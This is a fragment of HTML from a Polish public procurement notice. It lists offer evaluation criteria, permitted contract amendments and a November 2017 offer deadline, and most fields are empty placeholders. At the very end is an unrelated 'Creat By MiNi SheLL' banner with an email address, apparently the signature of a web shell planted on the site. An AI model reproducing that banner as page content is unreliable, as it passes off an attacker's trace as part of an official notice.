id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>gwarancja</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>termin wykonania</TD><TD style='border: 1px solid black;border-collapse: collapse;'>20,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp"></span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">Wszelkie zmiany do umowy mogą być zgodnie z brzmieniem art. 144 UZP dokonane za zgodą obu stron, wyrażoną pod rygorem nieważności na piśmie w poniżej określonych przypadkach i warunkach:1)	terminu wykonania zamówienia - gdy w szczególności zmiana terminu wynika z uzasadnionego wniosku użytkownika, który z racjonalnych przyczyn zawnioskuje o przesuniecie terminu realizacji umowy lub zmianę harmonogramu prac, w tym, jeżeli taki wniosek uzasadnia ważny interes obrony RP. Zmiana terminu może wynikać także z:?	wystąpienia robót zamiennych;?	nieterminowego przekazania Wykonawcy placu budowy, dziennika budowy, dokumentacji projektowej, osnowy geodezyjnej;?	wystąpienia zamówień dodatkowych, które determinują wykonanie zamówienia podstawowego.2)	Zmiany za zgodą Zamawiającego w zakresie zaoferowanych materiałów, urządzeń itp. - w przypadku gdy w szczególności w trakcie realizacji umowy nastąpi wycofanie materiałów, urządzeń itp. ze sprzedaży, a wprowadzenie substytutów nie powoduje zmiany parametrów świadczenia.3)	Zmiany w zakresie osób reprezentujących strony umowy, w szczególności w sytuacjach losowych, zmian organizacyjnych - kierownika budowy i kierowników robót branżowych, inspektorów nadzoru.4)	Zmiany w zakresie wskazanych dla realizacji umowy podwykonawców - w przypadku gdy w szczególności podwykonawca wadliwie wykonuje umowę, w tym zaprzestał jej wykonywania lub w razie upadłości/likwidacji Podwykonawcy.5)	Wartości zakresu realizacji umowy - w szczególności w przypadku wyłączenia obiektu, urządzenia z użytkowania lub jego likwidacji, konieczności wykonania prac zamiennych lub zmniejszających zakres robót oraz zmiany technologii wykonania robót.6)	Zmiany limitu finansowego w danym roku budżetowym.7)	Wystąpienia wyjątkowych, nieprzewidzianych oraz niezależnych od stron okoliczności (np. znalezienie niewybuchów, odkrycie niezinwentaryzowanych urządzeń podziemnych, odmowy udostępnienia obiektów przez Użytkownika, itp.).</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2017-11-15</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">11:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu"></span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki">język polski</span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b> <span id="ctl00_ContentPlaceHolder1_IV_6_5">Nie</span> <br/> <b>IV.6.6) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com